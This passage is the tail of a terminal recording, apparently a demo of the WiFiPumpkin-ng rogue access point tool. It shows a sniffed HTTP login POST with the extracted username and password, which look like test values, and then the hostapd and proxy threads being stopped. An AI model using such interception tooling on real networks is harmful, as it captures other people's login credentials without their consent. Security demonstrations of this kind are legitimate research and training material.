[116.362866, "o", "        |mit&login=true|\u001b[0;97;49m                           │\u001b[22;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m[\u001b[0;96;49mCredentials\u001b[0;39;49m]\u001b[0;97;49m                                                                                            │\u001b[23;1H\u001b[0;97;49m\u000f│\u001b[0;39;49mUsername: userxtest\u001b[0;97;49m                                                                                      │"]
[116.682376, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[15;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m        Http-Version : HTTP/1.1\u001b[0;97;49m                                                                          │\u001b[16;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m[\u001b[0;96;49mBody\u001b[0;39;49m]\u001b[0;97;49m                                                                                                   │\u001b[17;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000000:  75 73 65 72 5f 6e 61 6d  65 3d 75 73 65 72 78 74   |user_name=userxt|\u001b[0;97;49m                         │\u001b[18;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000010:  65 73 74 26 70 61 73 73  77 6f 72 64 3d 70 61 73   |est&password=pas|\u001b[0;97;49m                         │\u001b[19;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000020:  73 77 6f 72 64 26 53 75  62 6d 69 74 3d 53 75 62   |sword&Submit=Sub|\u001b[0;97;49m                         │\u001b[20;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000030:  6d 69 74 26 6c 6f 67 69  6e 3d 74 72 75 65         |mit&login=true|\u001b[0;97;49m                           │\u001b[21;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m[\u001b[0;96;49mCredentials\u001b[0;39;49m]\u001b[0;97;49m           "]
[116.68296, "o", "                                                                                 │\u001b[22;1H\u001b[0;97;49m\u000f│\u001b[0;39;49mUsername: userxtest\u001b[0;97;49m                                                                                      │\u001b[23;1H\u001b[0;97;49m\u000f│\u001b[0;39;49mPassword: password\u001b[0;97;49m                                                                                       │"]
[116.700726, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H\u001b[15;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m[\u001b[0;96;49mBody\u001b[0;39;49m]\u001b[0;97;49m                                                                                                   │\u001b[16;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000000:  75 73 65 72 5f 6e 61 6d  65 3d 75 73 65 72 78 74   |user_name=userxt|\u001b[0;97;49m                         │\u001b[17;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000010:  65 73 74 26 70 61 73 73  77 6f 72 64 3d 70 61 73   |est&password=pas|\u001b[0;97;49m                         │\u001b[18;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000020:  73 77 6f 72 64 26 53 75  62 6d 69 74 3d 53 75 62   |sword&Submit=Sub|\u001b[0;97;49m                         │\u001b[19;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m00000030:  6d 69 74 26 6c 6f 67 69  6e 3d 74 72 75 65         |mit&login=true|\u001b[0;97;49m                           │\u001b[20;1H\u001b[0;97;49m\u000f│\u001b[0;39;49m[\u001b[0;96;49mCredentials\u001b[0;39;49m]\u001b[0;97;49m                                                                                            │\u001b[21;1H\u001b[0;97;49m\u000f│\u001b[0;39;49mUsername: userxtest\u001b[0;97;49m     "]
[116.701349, "o", "                                                                                 │\u001b[22;1H\u001b[0;97;49m\u000f│\u001b[0;39;49mPassword: password\u001b[0;97;49m                                                                                       │\u001b[23;1H\u001b[0;97;49m\u000f│\u001b[0;39;49mPackets: 10.0.0.21:41741/184.168.193.216:80\u001b[0;97;49m                                                              │"]
[117.095453, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H"]
[117.163172, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H"]
[117.373435, "o", "\u001b[?25l\u001b[0;39;49m\u001b[H\u001b[1;1H"]
[119.850558, "o", "\u001b[?1002l\u001b[?1000l\u001b[0;39;49m\u000f\u001b[?47l\u001b8\u001b[?25h"]
[119.856026, "o", "\u001b[4m\u001b[1m\u001b[34mwp-ng\u001b[0m > "]
[122.788027, "o", "st"]
[123.721026, "o", "o"]
[123.776983, "o", "p"]
[124.072865, "o", "\r\n"]
[124.370961, "o", "Thread::[hostapd] successfully stopped.\r\n"]
[125.781512, "o", "\u001b[34m\u001b[1m[*]\u001b[0m  pumpkin-proxy successfully stopped.\r\n"]
[125.781796, "o", "Thread::[tcp-proxy] successfully stopped.\r\n"]
[125.787251, "o", "\u001b[4m\u001b[1m\u001b[34mwp-ng\u001b[0m > "]
[126.585438, "o", "e"]
[126.848928, "o", "x"]
[127.016922, "o", "i"]
[127.169107, "o", "t"]
[127.297191, "o", "\r\n"]
[129.115589, "o", "Quitting.\r\n"]
[129.459145, "o", "\u001b]0;mh4x0f@0xfl4bs: ~/Developer/WiFiPumpkin-ng\u0007\u001b[01;32mmh4x0f@0xfl4bs\u001b[00m:\u001b[01;34m~/Developer/WiFiPumpkin-ng\u001b[00m$ "]
[129.841007, "o", "exit\r\n"]
